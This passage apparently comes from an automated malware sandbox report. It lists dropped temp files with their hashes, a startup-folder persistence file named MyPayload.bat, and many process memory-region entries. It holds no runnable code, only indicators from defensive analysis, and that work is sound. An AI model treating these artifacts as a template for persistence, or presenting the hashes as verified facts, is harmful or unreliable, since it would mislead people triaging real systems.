                                        Filesize

                                        12KB

                                        MD5

                                        f7f8278054d793313c58d658e18f7ae8

                                        SHA1

                                        ac21400620a47f317abd348dc5dc4118694e5a91

                                        SHA256

                                        2aab994f7c36a62dee98bc6f2d64098db98dd44b9b44917d396f54f351773320

                                        SHA512

                                        4bacd392ff5079dd5a873a0eee719f30b0ce9fae558b26e08533a7203f966a16233ae6014b856461bafecfe0b5875c922cfd0553fab81d0c4ec521785549e06d

                                      • C:\Users\Admin\AppData\Local\Temp\tmpC594.tmp

                                        Filesize

                                        407KB

                                        MD5

                                        aadd2ae5d6a6d7fd721e4d9c45109102

                                        SHA1

                                        7b8793e02fd3f17cc3ea2c7ecce8323a4c869011

                                        SHA256

                                        68db346b90b2ef4f479d525cca018576348e34593b7887de7e1a4783ce73e3a3

                                        SHA512

                                        bd47821c99914d23f33ee1c606752e31e677aaeb871899a14503e612670afdf7a1165c582b3495ce0115350fe8310e790379a94f1465970dab18a53348f013f4

                                      • C:\Users\Admin\AppData\Local\Temp\tmpC711.tmp

                                        Filesize

                                        40KB

                                        MD5

                                        a182561a527f929489bf4b8f74f65cd7

                                        SHA1

                                        8cd6866594759711ea1836e86a5b7ca64ee8911f

                                        SHA256

                                        42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914

                                        SHA512

                                        9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

                                      • C:\Users\Admin\AppData\Local\Temp\tmpC727.tmp

                                        Filesize

                                        114KB

                                        MD5

                                        b28c7f7cff15a860603a1d6523afb720

                                        SHA1

                                        281af1b07b39c5b75f451d2d86bfd07b42054c39

                                        SHA256

                                        3df169b8995f5d21eefd5f2c1edb3a15f51dcaae38c2d16d1050b3c884c71f14

                                        SHA512

                                        f80e505c77286abb99aa03a3f25510cf0eb092892adb2fb02add9011c85362c8d215cd1225bc73a582f4b149bdedcbb1379ae1d48d320cc535cf20710be89af3

                                      • C:\Users\Admin\AppData\Local\Temp\tmpC752.tmp

                                        Filesize

                                        48KB

                                        MD5

                                        349e6eb110e34a08924d92f6b334801d

                                        SHA1

                                        bdfb289daff51890cc71697b6322aa4b35ec9169

                                        SHA256

                                        c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a

                                        SHA512

                                        2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

                                      • C:\Users\Admin\AppData\Local\Temp\tmpC777.tmp

                                        Filesize

                                        20KB

                                        MD5

                                        49693267e0adbcd119f9f5e02adf3a80

                                        SHA1

                                        3ba3d7f89b8ad195ca82c92737e960e1f2b349df

                                        SHA256

                                        d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f

                                        SHA512

                                        b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2

                                      • C:\Users\Admin\AppData\Local\Temp\tmpC77D.tmp

                                        Filesize

                                        116KB

                                        MD5

                                        f70aa3fa04f0536280f872ad17973c3d

                                        SHA1

                                        50a7b889329a92de1b272d0ecf5fce87395d3123

                                        SHA256

                                        8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8

                                        SHA512

                                        30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

                                      • C:\Users\Admin\AppData\Local\Temp\tmpC7F7.tmp

                                        Filesize

                                        96KB

                                        MD5

                                        40f3eb83cc9d4cdb0ad82bd5ff2fb824

                                        SHA1

                                        d6582ba879235049134fa9a351ca8f0f785d8835

                                        SHA256

                                        cdd772b00ae53d4050150552b67028b7344bb1d345bceb495151cc969c27a0a0

                                        SHA512

                                        cdd4dbf0b1ba73464cd7c5008dc05458862e5f608e336b53638a14965becd4781cdea595fd6bd18d0bf402dccffd719da292a6ce67d359527b4691dc6d6d4cc2

                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat

                                        Filesize

                                        330KB

                                        MD5

                                        aee2a2249e20bc880ea2e174c627a826

                                        SHA1

                                        aa87ed4403e676ce4f4199e3f9142aeba43b26d9

                                        SHA256

                                        4d9c00fc77e231366228a938868306a71383967472d0bbf1a89afe390d80599c

                                        SHA512

                                        4e96c2aa60cc1904ac5c86389f5d1226baf4ef81e2027369979ec253b383eccc666da268647843d1db128af16d1504cdc7c77757ad4147a0332ec9f90041a110

                                      • memory/1084-754-0x0000000000400000-0x000000000045D000-memory.dmp

                                        Filesize

                                        372KB

                                      • memory/1084-757-0x0000000000400000-0x000000000045D000-memory.dmp

                                        Filesize

                                        372KB

                                      • memory/1392-46-0x0000000000400000-0x000000000045F000-memory.dmp

                                        Filesize

                                        380KB

                                      • memory/1392-48-0x0000000000400000-0x000000000045F000-memory.dmp

                                        Filesize

                                        380KB

                                      • memory/2044-706-0x0000000000400000-0x00000000008BF000-memory.dmp

                                        Filesize

                                        4.7MB

                                      • memory/2044-653-0x0000000000400000-0x00000000008BF000-memory.dmp

                                        Filesize

                                        4.7MB

                                      • memory/2044-253-0x0000000000400000-0x00000000008BF000-memory.dmp

                                        Filesize

                                        4.7MB

                                      • memory/2044-127-0x0000000000400000-0x00000000008BF000-memory.dmp

                                        Filesize

                                        4.7MB

                                      • memory/2044-243-0x0000000000400000-0x00000000008BF000-memory.dmp

                                        Filesize

                                        4.7MB

                                      • memory/2044-128-0x0000000000400000-0x00000000008BF000-memory.dmp

                                        Filesize

                                        4.7MB

                                      • memory/2476-621-0x0000000008740000-0x0000000008750000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/2476-644-0x000000000BBD0000-0x000000000BBD5000-memory.dmp

                                        Filesize

                                        20KB

                                      • memory/2476-628-0x0000000008740000-0x0000000008750000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/2476-629-0x0000000008740000-0x0000000008750000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/2476-630-0x0000000008740000-0x0000000008750000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/2476-631-0x0000000008740000-0x0000000008750000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/2476-632-0x0000000008740000-0x0000000008750000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/2476-633-0x0000000008740000-0x0000000008750000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/2476-634-0x0000000008740000-0x0000000008750000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/2476-635-0x0000000008740000-0x0000000008750000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/2476-625-0x0000000008740000-0x0000000008750000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/2476-636-0x0000000008740000-0x0000000008750000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/2476-637-0x0000000008740000-0x0000000008750000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/2476-638-0x0000000008740000-0x0000000008750000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/2476-213-0x0000000005880000-0x0000000005BD4000-memory.dmp

                                        Filesize

                                        3.3MB

                                      • memory/2476-639-0x0000000008740000-0x0000000008750000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/2476-640-0x0000000008740000-0x0000000008750000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/2476-641-0x000000000BBD0000-0x000000000BBD5000-memory.dmp

                                        Filesize

                                        20KB

                                      • memory/2476-624-0x0000000008740000-0x0000000008750000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/2476-627-0x0000000008740000-0x0000000008750000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/2476-226-0x00000000061F0000-0x0000000006234000-memory.dmp

                                        Filesize

                                        272KB

                                      • memory/2476-227-0x0000000006FF0000-0x0000000007066000-memory.dmp

                                        Filesize

                                        472KB

                                      • memory/2476-648-0x000000000BC60000-0x000000000C06B000-memory.dmp

                                        Filesize

                                        4.0MB

                                      • memory/2476-617-0x00000000084E0000-0x00000000086EF000-memory.dmp

                                        Filesize

                                        2.1MB

                                      • memory/2476-618-0x0000000008730000-0x0000000008736000-memory.dmp

                                        Filesize

                                        24KB

                                      • memory/2476-255-0x0000000004BB0000-0x0000000004BBA000-memory.dmp

                                        Filesize

                                        40KB

                                      • memory/2476-257-0x0000000007440000-0x0000000007482000-memory.dmp

                                        Filesize

                                        264KB

                                      • memory/2476-649-0x000000000C0F0000-0x000000000C0F7000-memory.dmp

                                        Filesize

                                        28KB

                                      • memory/2476-645-0x000000000BC60000-0x000000000C06B000-memory.dmp

                                        Filesize

                                        4.0MB

                                      • memory/2476-626-0x0000000008740000-0x0000000008750000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/2476-614-0x00000000084E0000-0x00000000086EF000-memory.dmp

                                        Filesize

                                        2.1MB

                                      • memory/2904-702-0x0000000000400000-0x0000000000459000-memory.dmp

                                        Filesize

                                        356KB

                                      • memory/2904-704-0x0000000000400000-0x0000000000459000-memory.dmp

                                        Filesize

                                        356KB

                                      • memory/3352-697-0x0000000000640000-0x0000000000AF3000-memory.dmp

                                        Filesize

                                        4.7MB

                                      • memory/3352-703-0x0000000000640000-0x0000000000AF3000-memory.dmp

                                        Filesize

                                        4.7MB

                                      • memory/3448-56-0x00000000009C0000-0x0000000000E6F000-memory.dmp

                                        Filesize

                                        4.7MB

                                      • memory/3448-57-0x00000000009C0000-0x0000000000E6F000-memory.dmp

                                        Filesize

                                        4.7MB

                                      • memory/3516-224-0x00000000073E0000-0x000000000742C000-memory.dmp

                                        Filesize

                                        304KB

                                      • memory/3516-225-0x00000000076C0000-0x00000000077CA000-memory.dmp

                                        Filesize

                                        1.0MB

                                      • memory/3516-212-0x00000000073C0000-0x00000000073D2000-memory.dmp

                                        Filesize

                                        72KB

                                      • memory/3516-211-0x0000000007A80000-0x0000000008098000-memory.dmp

                                        Filesize

                                        6.1MB

                                      • memory/3516-603-0x0000000000FC0000-0x0000000001438000-memory.dmp

                                        Filesize

                                        4.5MB

                                      • memory/3516-219-0x0000000007460000-0x000000000749C000-memory.dmp

                                        Filesize

                                        240KB

                                      • memory/3516-612-0x000000000A6A0000-0x000000000A732000-memory.dmp

                                        Filesize

                                        584KB

                                      • memory/3516-613-0x000000000A7C0000-0x000000000A7DE000-memory.dmp

                                        Filesize

                                        120KB

                                      • memory/3516-209-0x0000000000FC0000-0x0000000001438000-memory.dmp

                                        Filesize

                                        4.5MB

                                      • memory/3516-261-0x00000000090A0000-0x00000000095CC000-memory.dmp

                                        Filesize

                                        5.2MB

                                      • memory/3516-260-0x00000000089A0000-0x0000000008B62000-memory.dmp

                                        Filesize

                                        1.8MB

                                      • memory/3516-192-0x0000000000FC0000-0x0000000001438000-memory.dmp

                                        Filesize

                                        4.5MB

                                      • memory/3516-208-0x0000000000FC0000-0x0000000001438000-memory.dmp

                                        Filesize

                                        4.5MB

                                      • memory/3736-724-0x0000000000E80000-0x000000000132A000-memory.dmp

                                        Filesize

                                        4.7MB

                                      • memory/3736-731-0x0000000000E80000-0x000000000132A000-memory.dmp

                                        Filesize

                                        4.7MB

                                      • memory/3856-1082-0x0000000000400000-0x000000000083C000-memory.dmp

                                        Filesize

                                        4.2MB

                                      • memory/3856-937-0x0000000000400000-0x000000000083C000-memory.dmp

                                        Filesize

                                        4.2MB

                                      • memory/3880-4-0x0000000000CA0000-0x000000000114F000-memory.dmp

                                        Filesize

                                        4.7MB

                                      • memory/3880-3-0x0000000000CA0000-0x000000000114F000-memory.dmp

                                        Filesize

                                        4.7MB

                                      • memory/3880-17-0x0000000000CA0000-0x000000000114F000-memory.dmp

                                        Filesize

                                        4.7MB

                                      • memory/3880-0-0x0000000000CA0000-0x000000000114F000-memory.dmp

                                        Filesize

                                        4.7MB

                                      • memory/3880-1-0x0000000077904000-0x0000000077906000-memory.dmp

                                        Filesize

                                        8KB

                                      • memory/3880-18-0x0000000000CA1000-0x0000000000D09000-memory.dmp

                                        Filesize

                                        416KB

                                      • memory/3880-2-0x0000000000CA1000-0x0000000000D09000-memory.dmp

                                        Filesize

                                        416KB

                                      • memory/4240-43-0x0000000000B90000-0x0000000000C40000-memory.dmp

                                        Filesize

                                        704KB

                                      • memory/4240-44-0x0000000005990000-0x0000000005F34000-memory.dmp

                                        Filesize

                                        5.6MB

                                      • memory/4240-42-0x000000007351E000-0x000000007351F000-memory.dmp

                                        Filesize

                                        4KB

                                      • memory/4300-107-0x0000000000BD0000-0x0000000000C2C000-memory.dmp

                                        Filesize

                                        368KB

                                      • memory/4344-109-0x0000000000400000-0x000000000045F000-memory.dmp

                                        Filesize

                                        380KB

                                      • memory/4344-111-0x0000000000400000-0x000000000045F000-memory.dmp

                                        Filesize

                                        380KB

                                      • memory/4392-843-0x00000000004E0000-0x000000000052C000-memory.dmp

                                        Filesize

                                        304KB

                                      • memory/4400-751-0x00000000003D0000-0x000000000047C000-memory.dmp

                                        Filesize

                                        688KB

                                      • memory/4400-873-0x0000000000730000-0x0000000000740000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/4564-676-0x00000000002D0000-0x0000000000760000-memory.dmp

                                        Filesize

                                        4.6MB

                                      • memory/4564-671-0x00000000002D0000-0x0000000000760000-memory.dmp

                                        Filesize

                                        4.6MB

                                      • memory/4584-819-0x0000000000CF0000-0x000000000138B000-memory.dmp

                                        Filesize

                                        6.6MB

                                      • memory/4584-880-0x0000000000CF0000-0x000000000138B000-memory.dmp

                                        Filesize

                                        6.6MB

                                      • memory/4884-153-0x00000000009C0000-0x0000000000E6F000-memory.dmp

                                        Filesize

                                        4.7MB

                                      • memory/4884-674-0x00000000009C0000-0x0000000000E6F000-memory.dmp

                                        Filesize

                                        4.7MB

                                      • memory/4884-49-0x00000000009C0000-0x0000000000E6F000-memory.dmp

                                        Filesize

                                        4.7MB

                                      • memory/4884-50-0x00000000009C0000-0x0000000000E6F000-memory.dmp

                                        Filesize

                                        4.7MB

                                      • memory/4884-21-0x00000000009C0000-0x0000000000E6F000-memory.dmp

                                        Filesize

                                        4.7MB

                                      • memory/4884-22-0x00000000009C0000-0x0000000000E6F000-memory.dmp

                                        Filesize

                                        4.7MB

                                      • memory/4884-20-0x00000000009C0000-0x0000000000E6F000-memory.dmp

                                        Filesize

                                        4.7MB

                                      • memory/4884-51-0x00000000009C0000-0x0000000000E6F000-memory.dmp

                                        Filesize

                                        4.7MB

                                      • memory/4884-23-0x00000000009C0000-0x0000000000E6F000-memory.dmp

                                        Filesize

                                        4.7MB

                                      • memory/4884-16-0x00000000009C0000-0x0000000000E6F000-memory.dmp

                                        Filesize

                                        4.7MB

                                      • memory/4884-52-0x00000000009C0000-0x0000000000E6F000-memory.dmp

                                        Filesize

                                        4.7MB

                                      • memory/4884-728-0x00000000009C0000-0x0000000000E6F000-memory.dmp

                                        Filesize

                                        4.7MB

                                      • memory/4884-53-0x00000000009C0000-0x0000000000E6F000-memory.dmp

                                        Filesize

                                        4.7MB

                                      • memory/4884-54-0x00000000009C0000-0x0000000000E6F000-memory.dmp

                                        Filesize

                                        4.7MB

                                      • memory/4884-259-0x00000000009C0000-0x0000000000E6F000-memory.dmp

                                        Filesize

                                        4.7MB

                                      • memory/4884-76-0x00000000009C0000-0x0000000000E6F000-memory.dmp

                                        Filesize

                                        4.7MB

                                      • memory/4928-195-0x0000000007380000-0x000000000738A000-memory.dmp

                                        Filesize

                                        40KB

                                      • memory/4928-168-0x0000000007640000-0x0000000007CBA000-memory.dmp

                                        Filesize

                                        6.5MB

                                      • memory/4928-194-0x0000000007390000-0x00000000073A2000-memory.dmp

                                        Filesize

                                        72KB

                                      • memory/4928-182-0x00000000072B0000-0x00000000072D2000-memory.dmp

                                        Filesize

                                        136KB

                                      • memory/4928-137-0x0000000004EC0000-0x00000000054E8000-memory.dmp

                                        Filesize

                                        6.2MB

                                      • memory/4928-138-0x0000000004C90000-0x0000000004CB2000-memory.dmp

                                        Filesize

                                        136KB

                                      • memory/4928-139-0x0000000004E30000-0x0000000004E96000-memory.dmp

                                        Filesize

                                        408KB

                                      • memory/4928-140-0x0000000005620000-0x0000000005686000-memory.dmp

                                        Filesize

                                        408KB

                                      • memory/4928-150-0x0000000005860000-0x0000000005BB4000-memory.dmp

                                        Filesize

                                        3.3MB

                                      • memory/4928-151-0x0000000005C40000-0x0000000005C5E000-memory.dmp

                                        Filesize

                                        120KB

                                      • memory/4928-152-0x0000000005C70000-0x0000000005CBC000-memory.dmp

                                        Filesize

                                        304KB

                                      • memory/4928-155-0x0000000006C50000-0x0000000006C82000-memory.dmp

                                        Filesize

                                        200KB

                                      • memory/4928-156-0x000000006FC90000-0x000000006FCDC000-memory.dmp

                                        Filesize

                                        304KB

                                      • memory/4928-166-0x0000000006260000-0x000000000627E000-memory.dmp

                                        Filesize

                                        120KB

                                      • memory/4928-167-0x0000000006F10000-0x0000000006FB3000-memory.dmp

                                        Filesize

                                        652KB

                                      • memory/4928-136-0x0000000002320000-0x0000000002356000-memory.dmp

                                        Filesize

                                        216KB

                                      • memory/4928-169-0x0000000006CE0000-0x0000000006CFA000-memory.dmp

                                        Filesize

                                        104KB

                                      • memory/4928-172-0x0000000007180000-0x0000000007191000-memory.dmp

                                        Filesize

                                        68KB

                                      • memory/4928-171-0x0000000007210000-0x00000000072A6000-memory.dmp

                                        Filesize

                                        600KB

                                      • memory/4928-170-0x0000000007000000-0x000000000700A000-memory.dmp

                                        Filesize

                                        40KB

                                      • memory/5048-797-0x00000000009C0000-0x0000000000E6F000-memory.dmp

                                        Filesize

                                        4.7MB

                                      • memory/5048-789-0x00000000009C0000-0x0000000000E6F000-memory.dmp

                                        Filesize

                                        4.7MB

                                      • memory/5760-1123-0x00000000005B0000-0x0000000000A78000-memory.dmp

                                        Filesize

                                        4.8MB

                                      • memory/5760-1126-0x00000000005B0000-0x0000000000A78000-memory.dmp

                                        Filesize

                                        4.8MB

                                      • memory/5764-1011-0x0000000000BD0000-0x0000000001044000-memory.dmp

                                        Filesize

                                        4.5MB

                                      • memory/5764-1009-0x0000000000BD0000-0x0000000001044000-memory.dmp

                                        Filesize

                                        4.5MB

                                      • memory/5764-1007-0x0000000000BD0000-0x0000000001044000-memory.dmp

                                        Filesize

                                        4.5MB

                                      • memory/5764-1142-0x0000000000BD0000-0x0000000001044000-memory.dmp

                                        Filesize

                                        4.5MB

                                      • memory/5764-1151-0x0000000000BD0000-0x0000000001044000-memory.dmp

                                        Filesize

                                        4.5MB

                                      • memory/5920-1171-0x0000000000400000-0x000000000083C000-memory.dmp

                                        Filesize

                                        4.2MB